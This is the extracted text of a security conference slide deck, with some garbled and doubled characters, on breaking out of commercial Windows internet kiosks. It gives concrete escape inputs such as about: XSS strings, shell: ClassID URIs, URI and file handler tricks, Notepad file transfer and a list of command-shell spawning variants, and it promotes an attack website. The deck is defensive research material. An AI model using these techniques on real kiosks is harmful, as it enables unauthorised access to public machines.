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Overview

Hacking Kiosks:

What is an Internet KioskWhat is an Internet Kiosk.

Kiosk Software Security Model.

Vulnerabilities in Kiosk Software.

Vulnerabilities in the Kiosk Security Model.

“Hack any Windows Kiosk in less than 120 seconds!”

Tool Release.

Live Demo’s: Hacking (Two) Commercial Internet Kiosks.

More 0day than you can shake a stick at.More 0day than you can shake a stick at.



What Is An Internet Kiosk

Last Year I Was Sitting in an Airport….

8 hour stop-over in Hong Kong8 hour stop-over in Hong Kong.

Queue of people waiting to use a hub of Internet Kiosks.

“Damn, those kiosks sure are popular…”

“ d if ld h k i ”“I wonder if I could hack it?.”

Kiosks are popular, and rarely appear in security publications.p p , y pp y p

Popularity + Poor Security Visibility = Good Attack Target

Personal Objective:

Find every possible method of hacking Internet Kiosk terminals.

Become the King of Internet Kiosk Hacking!



What Is An Internet Kiosk

Kiosks are everywhere

Airports Train stations Libraries DVD Rental Stores CorporateAirports, Train stations, Libraries, DVD Rental Stores, Corporate 
Building Lobbies, Convenience Stores, Post Office, Café’s, 
Hospitals, Motels, Hotels, Universities.

Cheap technology has made Internet Kiosks very common.



What Is An Internet Kiosk

Initial Observations of Kiosks

Hardware.

Ki k b ilt i t h h d h llKiosks built in tough hard-shell cases.

Fibreglass, Steel, Thick MDF.

Lack of physical access to the underlying computer.

Input devices inaccessible (Floppy/DVD/USB/FireWire)

Kiosk bolted to the ground (padlocked).

General public are not trustedGeneral public are not trusted.

Kiosks are designed to prevent physical theft or malicious use.



What Is An Internet Kiosk

Software.

Majority of Kiosks run commercial Windows Kiosk softwareMajority of Kiosks run commercial Windows Kiosk software.

Linux/BSD Kiosks exist, Windows more popular.

44 commercial Windows Kiosk products in the market.

Marketed as : “Turn that old PC into instant revenue!”

Buy $59.99 Shareware -> Install -> Instant Kiosk!

k f ll k dKiosk Software Essentially Skins Windows:

Kiosk browsers based on standard Internet Explorer libraries.

WINHTTP.DLL/MSINET.OCX

Its Windows and Internet Explorer, highly customized.Its Windows and Internet Explorer, highly customized.



What Is An Internet Kiosk

“Kiosk Software Is The Best Attack Target.”

Hardware hacking is too obtrusive for public locationsHardware hacking is too obtrusive for public locations.

“I Need to Walk up to Any Internet Kiosk and Pop Shell, Quickly.”

Explorer.exe, cmd.exe, command.com.

Time limited, 2 minutes or faster.

16 Months of Kiosk Software Penetration Testing Later….

Vi t li d t f th t l Wi d Ki k l tfVirtualized ten of the most popular Windows Kiosk platforms.

Researched methods of compromising each Kiosk.

Developed Kiosk Attack Methodology.

Startling Results: 100% success rate!



Kiosk Security ModelKiosk Security Model



Kiosk Security Modely

Kiosk Software Implement Security in Two Approaches.

#1 - Reduce Available Host Functionality.

Disallow native OS functionality that can be used maliciously.

“Command Prompt has been Disabled”

“File Downloads Have Been Disabled”

Implemented through native ACL’s.

#2 G hi ll J il d I t ‘S Ki k B ’#2 – Graphically Jailed Into a ‘Secure Kiosk Browser’.

Kiosk users are stuck inside a Kiosk browser.

Kiosk browser ran in full screen, no ability to close, minimize.

Start Bar/Tray Menu removed or hidden.

Only thing you can do is browse the web.



Kiosk Security Modely

Example #1: Site Kiosk.

Looks similar to WindowsLooks similar to Windows.

Custom Tray Menu/Task Bar.

O l ti ‘N Wi d ’Only one option, ‘New Window’

Real Windows ‘Start’ bar is hidden from view.

Trapped inside the Kiosk browser.



Kiosk Security Modely

Example #2: NetStop Kiosk

Custom task barCustom task bar.

Kiosk application ran as a full screen desktop.

N bilit t l th bNo ability to close the browser.

Only permits internet browsing.



Kiosk Security Modely

Kiosk Browsers Proactively Monitor Your Activity.

Kiosks contain multiple blacklists of prohibited activity.

Try to do something sneaky, the Kiosk will stop you.

Try to Browse C:\ with the Kiosk browser:Try to Browse C:\ with the Kiosk browser:

Blacklist in focus Modal DialogsBlacklist in-focus Modal Dialogs.

Block dialogs by Window Title or Window Class.

“S Fil A ” “O With” “C fi Fil D l t ” “P i t”“Save File As”, “Open With”, “Confirm File Delete”, “Print”.

WM_CLOSE Window message sent to the blacklisted dialog.

Dialog closes.



Kiosk Security Modely

API Hooking.

Hook native OS API calls which can be used maliciouslyHook native OS API calls which can be used maliciously.

KillProcess(), GetCommandLineW(), AllocConsole()

“Unauthorized Functionality Detected Process Killed”Unauthorized Functionality Detected, Process Killed .

Kiosk Browser ran in ‘High Security Zone’

File downloads disabled.

Browser scripting, pop-ups, ActiveX, all disabled.

Watchdog Timer.

E 5 i h Ki k ill ll iEvery 5 minutes the Kiosk will enumerate all active processes.

Terminate any unauthorized activity.



Kiosk Security Modely

Custom Keyboard Driver.

Disable Windows shortcut key combinationsDisable Windows shortcut key combinations.

CTRL-SHIFT-ESC (Task Mgr)

ALT-TAB (Switch Task)

Modifier Keys Unmapped

CTRL-ALT-DELETE (Task Mgr)

CTRL-ESC (Start Menu)

Alt F4 (Close Application)Modifier Keys Unmapped.

CTRL, Tab, ALT, ‘Start’, Function, F1-F12.

Custom Keyboard with missing modifier keys!

Alt-F4 (Close Application)

Custom Keyboard with missing modifier keys!

Custom Mouse.

N i h li k bNo right click button.

All Methods of reducing functionality!g y



HackingHacking

Ki k S ftKiosk Software



Hacking Kiosk Softwareg

Kiosk Security Model is Based on Reducing Functionality.

Limit functionality which can be used to escape the Kiosk browser.

Exploiting A Kiosk Requires Invoking FunctionalityExploiting A Kiosk Requires Invoking Functionality.

Cause applications/functionality to spawn, popup on screen.

U th i k d f ti lit t th Ki k j ilUse the invoked functionality to escape the Kiosk jail.

Spawn a command prompt, get back to Windows.

Kiosk Security Is Implemented Through Blacklists.

Blacklists (by nature) are never 100%.Blacklists (by nature) are never 100%.

We only need one method of escaping the software jail.



Hacking Kiosk Softwareg

Lets Say You Find a Kiosk in Your Local Mall.

‘10RM for 1 hour of internet usage’10RM for 1 hour of internet usage

Insert money.

You Find You are Trapped Inside a Kiosk Browser.

Only one visible button to ‘Start Browsing’

Start Browsing…



Hacking Kiosk Softwareg

Browse The Local File System Using The Kiosk Browser.

Local Windows users are capable of browsing the file-systemLocal Windows users are capable of browsing the file system.

Kiosk software must explicitly block local browsing attempts.

Windows Is Designed For Idiots.

Caters for mistypes/fat-fingers.yp / g

C:\windows\ maybe blocked.

File:/C:/windows File:/C:\windows\ File:/C:\windows/ File:/C:/windowsFile:/C:/windows File:/C:\windows\ File:/C:\windows/ File:/C:/windows

File://C:/windows File://C:\windows/ file://C:\windows C:/windows

C:\windows\ C:\windows C:/windows/ C:/windows\

Bl kli t t t f ili b t

%WINDIR% %TMP% %TEMP% %SYSTEMDRIVE%

%SYSTEMROOT% %APPDATA% %HOMEDRIVE% %HOMESHARE%

Blacklists start failing about now.



Hacking Kiosk Softwareg

Using Common Dialogs To Hack Kiosks.

Windows contains ‘Common Dialogs’ librariesWindows contains Common Dialogs  libraries.

Saving a file, opening a file, selecting font, choosing a colour.

COMDLG32 DLL (Common Windows Dialogs Library)COMDLG32.DLL (Common Windows Dialogs Library).

COMDLG32.DLL Implements Common Windows Controls.

( d l b )From COMCTL32.DLL (Common Windows Controls Library)

File/Open, File/Save Dialog’s Contain ‘File View’ Controls.

File view control provides full Explorer functionality.

Same control that Windows Explorer uses.

File-Open Dialog = Explorer

Can be used to launch processes.



Hacking Kiosk Softwareg

Systematically Click Every Button, Graphic, Icon In The Kiosk

Can we invoke a File - Open Dialog? “Attach File”Can we invoke a File Open Dialog? Attach File

Browse the file system

Right Click cmd exe: Open / Run AsRight Click cmd.exe: Open / Run As

Spawn cmd.exe



Hacking Kiosk Softwareg

Internet Explorer ‘Image Toolbar’.

Toolbar hovers top-left of a large image when clickedToolbar hovers top-left of a large image when clicked.

Each icon of this toolbar can invoke a Common Dialog.

Fil /SFile/Save.

File/Print.

File/Mailto.

Open “My Pictures” in Explorer.

Toolbar is present if the Kiosk uses Internet Explorer libraries.

Click a large image on screen

Spawn a Common Dialog, spawn Explorer.



Hacking Kiosk Softwareg

Using the Keyboard.

Keyboard shortcuts can be used to access the host OSKeyboard shortcuts can be used to access the host OS.

Check if a custom keyboard driver present?

A difi k bl d?Are modifier keys enabled?

Keyboard Combinations Which Produce Common Dialogs.

CTRL-B, CTRL-I  (Favourites)

CTRL-H  (History)

CTRL L CTL 0 (File/Open Dialog)CTRL-L, CTL-0 – (File/Open Dialog)

CTRL-P – (Print Dialog)

CTRL-S – (Save As)

Kiosk Specific ‘Administrative’ shortcuts.

All Kiosk products contain a hidden Administrative menu.

( )

p

Mash the keyboard, CTRL-ALT-F8? CTRL-ESC-F9?



Hacking Kiosk Softwareg

Browser Security Zones

Browser security model incorporates multiple security zones:Browser security model incorporates multiple security zones:

Restricted Sites

Internet Zone

Intranet ZoneIntranet Zone

Trusted Sites

Each security zone adheres to a different security policy.

Internet zone has less ability to interact with a hostInternet zone has less ability to interact with a host.

Trusted Sites, Intranet Zone typically have more access.



Hacking Kiosk Softwareg

Local Users Can Access All Available Security Zones.

URL’s must be directly typed into the URL entry barURL s must be directly typed into the URL entry bar.

Security Zone Escalation. about: pluggable-protocol handler.

About handler belongs to the ‘Trusted Sites’ security zone.

Suffers from a Cross Site Scripting vulnerability.

Local users can render arbitrary content within a trusted zone.

Spawn a File Open Common Dialog from a trusted security zoneSpawn a File Open Common Dialog from a trusted security zone.

about:<input%20type=file>

b %20h f C \ i d \ Cli k H /about:<a%20href=C:\windows\>Click-Here</a>

Internet zone cannot follow links to the file system.y

Trusted sites can.



Hacking Kiosk Softwareg

Shell Protocol Handler.

Shell handler provides access to Windows web foldersShell handler provides access to Windows web folders.

Type Into the URI Bar:

Shell:Profile

Shell:ProgramFiles

Shell:System

Shell:ControlPanelFolder

Shell:Windows

E h URL ill l d b h b f ldEach URL will spawn explorer.exe and browse the web folder.

Is the shell: handler blocked by the Kiosk?



Hacking Kiosk Softwareg

How About This:

shell:::{21EC2020 3AEA 1069 A2DD 08002B30309D}shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}

Invoke the Windows Control Panel by ClassID.

W k f I t t E l lib iWorks from common Internet Explorer libraries.

Bypass native ACL’s that may exist on control.exe



Hacking Kiosk Softwareg

The Downside to Physical Input Vectors.

Kiosk software is designed to not trust the guy on the keyboardKiosk software is designed to not trust the guy on the keyboard.

Kiosk User = Most Obvious Security Threat.

My research concluded that physical inputs are not so successfulMy research concluded that physical inputs are not so successful.

40-50% chance of popping shell.

M t h i l d bli h d i i lMany techniques are already published, unoriginal.

A Subtle Discovery…A Subtle Discovery…

Remote websites not factored into the Kiosk security model.

Websites are trusted MORE than a local Kiosk user!Websites are trusted MORE than a local Kiosk user!

Kiosks rely on the default web browser security modelKiosks rely on the default web browser security model.



Hacking Kiosk Softwareg

“I Need a Kiosk Hacking Website.”

An online tool you can visit from an Internet Kiosk terminalAn online tool you can visit from an Internet Kiosk terminal.

Provide all the content you will ever need to escape a Kiosk jail.

iKAT – Interactive Kiosk Attack Tool.

First of its kind! New method of hacking Internet Kiosks!g

Fast!  iKAT can pop shell in less than 30 seconds.

95-100% success rate!95 100% success rate!

http://ikat.ha.cked.net



Hacking Kiosk Softwareg

What Can iKAT Do?

Kiosk Reconnaissance : Detect Installed ApplicationsKiosk Reconnaissance : Detect Installed Applications

JavaScript & res:// (resource) protocol handler.

Extract bitmap resources from PE executablesExtract bitmap resources from PE executables.

Verify bitmap presence and detect installed applications.

Detects all common commercial Kiosk platforms.

Enumerates locally installed applications.y pp



Hacking Kiosk Softwareg

Display Local Browser Variables.

Determine underlying Kiosk browser technologyDetermine underlying Kiosk browser technology.

MSINET.OCX, WINHTTP.DLL display Internet Explorer appVersion

Detect the presence of NET CLRDetect the presence of .NET CLR.

Display Remote Server Variables

Discover remote IP address of the Kiosk terminal.



Hacking Kiosk Softwareg

All Common Browser Dialogs In One Place

File Open, Save As, Print, Print Preview:

Click down the list and determine what dialogs are blocked.

Use the File View control within the dialogs.



Hacking Kiosk Softwareg

Use Flash To Invoke Common Dialogs.

Adobe Flash is the most widely used browser plug-inAdobe Flash is the most widely used browser plug in.

ActionScript 3 can invoke three unique File View dialogs.

‘Select File For Upload’Select File For Upload

‘Select File(s) For Upload’

‘S l t l ti f D l d b ik t h k d t’‘Select location for Download by ikat.ha.cked.net’

Flash Common Dialogs have Unique Dialog Titles

Not standard “Choose File”

Bypass dialog Window title blacklists.ypa d a og do b a

Still contains the File View control.

Blacklists fail (again).



Hacking Kiosk Softwareg

Spawning Applications On The Kiosk.

Can we cause an application/process to spawn on the KioskCan we cause an application/process to spawn on the Kiosk.

Does the spawned application contains a common dialog?

Use the application to gain additional access to the KioskUse the application to gain additional access to the Kiosk.

iKAT Invokes Default Windows URI Handlers.

URI handler applications are spawned for each URI.

Callto://, Gopher://, HCP://, Telnet://, TN3270://, Rlogin://, //, p //, //, //, //, g //,
LDAP://, News://, Mailto://

One Click Automation: One click spawns all default handlers.

3rd party URI Handlers

MMS:// SKYPE:// SIP:// Play:// Steam:// Quicktime://MMS://, SKYPE://, SIP://, Play://, Steam://, Quicktime://



Hacking Kiosk Softwareg

Example: HCP://: Help And Support Center

<a href=HCP://dummy> Click-me </a><a href HCP://dummy> Click me </a>

Search HCP for what you want to launch “Command Prompt”

“Using Command Prompt” provides link to spawn cmd exeUsing Command Prompt  provides link to spawn cmd.exe

Left Click Only! 



Hacking Kiosk Softwareg

iKAT Provides Links to Over 100 URI Handlers.

Click click click down the listClick, click, click down the list.

Determine which handlers are covered by the Kiosk blacklist.

Use invoked handler application to escape the KioskUse invoked handler application to escape the Kiosk.

iKAT Contains Local Security Zone Handlers

about:, res:, shell:

Lists of URL’s to type in.

Remembering ClassID’s is hard.



Hacking Kiosk Softwareg

Invoke Applications Using File Type Handlers.

Click on test myfile Windows will spawn the ‘myfile’ handlerClick on test.myfile, Windows will spawn the myfile  handler.

iKAT uses DHTML/JavaScript to invoke 108 unique file handlers.

Internet Explorer supports prompt-less handler execution.

Example: Click test.wmv, Windows Media Player Spawns.

No Prompt “Are you sure you want to…”.

Kiosk blacklists monitor in focus dialogs for warning prompts.



Hacking Kiosk Softwareg

iKAT & Windows Media Files.

WMPlayer will silently launch for multiple file typesWMPlayer will silently launch for multiple file types.

Windows Media Playlist Files (.ASX)

S t ‘W b E h d C t t’Supports ‘Web Enhanced Content’.

Turn Windows Media Player into a web browser!y

Provides a browser without any Kiosk security controls.



Hacking Kiosk Softwareg

iKAT & Office Documents.

If an Office file viewer is installed on the Kiosk we winIf an Office file viewer is installed on the Kiosk, we win.

Embed a copy of cmd.exe within an office document.

Supported by DOC DOCX XLS XLSB XLSM XLSXSupported by .DOC,.DOCX,.XLS,.XLSB,.XLSM,XLSX

‘Open Package Contents’ dialog not detected by any Kiosk.

iKAT will spawn the most useful file possible.



Hacking Kiosk Softwareg

iKAT & Java Applets:

Signed Java applets can execute local processesSigned Java applets can execute local processes.

Detect if JRE is installed (iKAT Kiosk Reconnaissance).

Does the Kiosk detect the Java security warning prompt?Does the Kiosk detect the Java security warning prompt?

“Warning – Security”

0% f t t d Ki k did0% of tested Kiosks did.

iKAT Contains Signed Kiosk Specific Java Applets.o a g d o p a a pp

Signed applets to spawn command shells.

Includes Jython by GNUCITIZENIncludes Jython by GNUCITIZEN.



Hacking Kiosk Softwareg

Install a Malicious ActiveX

Safe for scripting ActiveX’s can be used to compromise a KioskSafe for scripting ActiveX s can be used to compromise a Kiosk.

Unsafe method: object.execute(‘cmd.exe’);

Can we install a malicious ActiveX on the Kiosk?Can we install a malicious ActiveX on the Kiosk?

iKAT ActiveX

Safe-for-scripting ActiveX which executes arbitrary executables.

Installing an ActiveX requires administrative authority.g q y

iKAT ActiveX gives you the ability to spawn a shell.

ActiveX is changing:

IE8 will not require admin rights for installing a new ActiveXIE8 will not require admin rights for installing a new ActiveX.



Hacking Kiosk Softwareg

iKAT & ClickOnce Applications

ClickOnce is NET 2 0+ technology ( NET CLR 2+ required)ClickOnce is .NET 2.0+ technology (.NET CLR 2+ required)

‘Online Application Deployment’ .application file handler.

Unsigned ClickOnce applications execute with full trust!Unsigned ClickOnce applications execute with full trust!

Admin privileges are not required!

Users are warned:

All tested Kiosks fail to detect this warning message!

Modern Kiosks now developed in .NET (CLR is present!)



Hacking Kiosk Softwareg

The most useful ClickOnce applications for Kiosk Hacking?

Embedded Web Browser.

HTTP browser with reduced security settings.

Application Executor.

Spawn arbitrary executablesSpawn arbitrary executables.

Access Token Pincher.

Access token hijacking is a hip subject, why not!

Does the Kiosk user have the SeImpersonate privilege?

Impersonate available (privileged) tokens.

Spawn cmd.exe under the context of the privileged token.Spa c d e e u de t e co te t o t e p eged to e

System shell, I win.



Hacking Kiosk Softwareg

Who Here Has Ever Crashed a Web Browser?

What about crashing a Kiosk: ‘Emo-Kiosking’What about crashing a Kiosk: Emo-Kiosking

Create an unhandled exception in a Kiosk browser.

Kiosk browser crashes We get the desktop We Win!Kiosk browser crashes, We get the desktop, We Win!

Rare situation: Application crash = highly critical vulnerability.

iKAT Contains Common Browser Crash Techniques.

P bli h d l it hi h lt i hPublished exploits which results in a crash.

Fastest, easiest method of escaping a Kiosk.

Fairly reliable, 40%-50% of tested Kiosks crash.

Kiosks crash, or reboot.



Hacking Kiosk Softwareg

Crashing Browser Plug-ins.

“Can I create a SWF file that can reliably crash a browser?”Can I create a .SWF file that can reliably crash a browser?

Sequential byte file format fuzzing of the .SWF format.

Found multiple unhandled exception situationsFound multiple unhandled exception situations.

Integer Divide By Zero.

d l l bl l bl h bImmediately un-exploitable, reliably crash any browser. 

Created ‘iKAT Auto Magic Flash Crasher’.

Is the Flash Plug-in Installed on The Kiosk?Is the Flash Plug in Installed on The Kiosk?

iKAT can crash it, guaranteed, oh-day magic.

Adobe have resolved this issue in Flash Player 10 RCAdobe have resolved this issue in Flash Player 10 RC.



Downloading Toolsg

Lets Assume Something Worked.

You have access to the Kiosk File systemYou have access to the Kiosk File system. 

Command shell spawned, Common Dialog,  Java installed, etc

What Now?

Download additional tools/binariesDownload additional tools/binaries.

How Do You Download Files In a Tool-less Environment.

Kiosk terminal will not have a copy of wget.exe present.

Internet Explorer is likely uninstalled or disabled.

File downloads disabled.



Downloading Toolsg

Old School: Downloading Files In Windows:

Using Common DialogsUsing Common Dialogs

‘Attach’ a remote file from a File-Open dialog.

FPSE/WebDAV to save the file locally and attach itFPSE/WebDAV to save the file locally, and attach it.

k l lWorks From Any File->Open Dialog.

File saved in a writeable location.

Temporary internet files.

Downloads any file type/size.



Downloading Toolsg

Use Flash To Download Files.

Most Kiosk’s disable File Downloads with browser security policyMost Kiosk s disable File Downloads with browser security policy.

IE: Tools -> Internet Options -> Custom Level

Flash can be used to circumvent the browser policy.

Download method of the FileReference() object.

Flash does not validate browser security policy.

Very high success rate against Kiosks.

Another unpublished oh-day trickAnother unpublished oh day trick.



Downloading Toolsg

Notepad Can Download and Upload Files.

File-> Open

htt //t t /t j t thttp://test.com/trojan.txt

Content must be 7bit safe.

File-> Save

Upload content to a remote site.Upload content to a remote site.

FPSE/WebDav

http://www ok com/blah txthttp://www.ok.com/blah.txt

Quickly upload files from a KioskQuickly upload files from a Kiosk.



Downloading Toolsg

#1 Problem: Kiosk Hacking is a Tool less Environment

“iKAT needs to provide tools for Kiosk hacking”iKAT needs to provide tools for Kiosk hacking .

Assorted Kiosk Hacking Tools:

Tools available as

.exe, .zip, Flash Download, 7bit Safe VBScript (.VBS/.VBE)!



Downloading Toolsg

Command Shell Detours:

How many ways to spawn a command shell on Windows?How many ways to spawn a command shell on Windows?
cmd.exe command.com win.com cmd.exe win.com command.com

Loadfix.com start.exe sc create testsvc binpath= 
"cmd /K start" type= own

loadfix.com cmd.exe loadfix.com command.com
cmd /K start  type  own 

type= interact

start loadfix.com cmd.exe start loadfix.com
command.com

start loadfix.com
cmd.exe

%COMSPEC%

Win.com? Loadfix.com? Start? Combinations of both?

Kiosk ACL’s typically block cmd.exe from spawning.yp y p g

What about command.com, win.com?

CMD Detours attempts 17 methods of invoking a shell.

Flawless at bypassing Kiosk ACL’s.



iKAT Reloaded

Officially Released at Defcon 16 Las Vegas.

Amazing success!

iKAT can pop shell on ANY Vegas Kiosk < 10 seconds

Who’s Been Using iKAT?

14 000+ unique hits 10 15% of requests from Kiosks!14,000+ unique hits, 10-15% of requests from Kiosks!
reception.sitekiosk.com, comm775-kiosknet-dhcp8.bu.edu & comm685-kiosknet-dhcp74.bu.edu

12-46-54-181.seatac.seattwa.wayport.net, Aoc.ppx-bc2.hqda-aoc.army.pentagon.mil

Digger2 defence gov au Radisson-hotel-19 lax customer centurytel netDigger2.defence.gov.au, Radisson-hotel-19.lax.customer.centurytel.net

Security-lab1.juniper.net, Lan-116.181.coresecurity.com

Ustdc1.deloitte.com, Deloitteservices.deloitte.nl, Dh212.public.mod.uk

iKAT Portable Now Available!

Entire iKAT website in a zip filep

Useful for offsite penetration testers.



Pwnage!g

Hacking Kiosks : The Demo’sg
Two virtualized (commercial) Kiosk products.

Recommended Kiosk application configuration.

Default Windows XP install.

Using iKAT To Pop a Command shell

As Fast As Possible!



Conclusion

Questions?

Email me:

paul@ha.cked.net

paul.craig@security-assessment.com


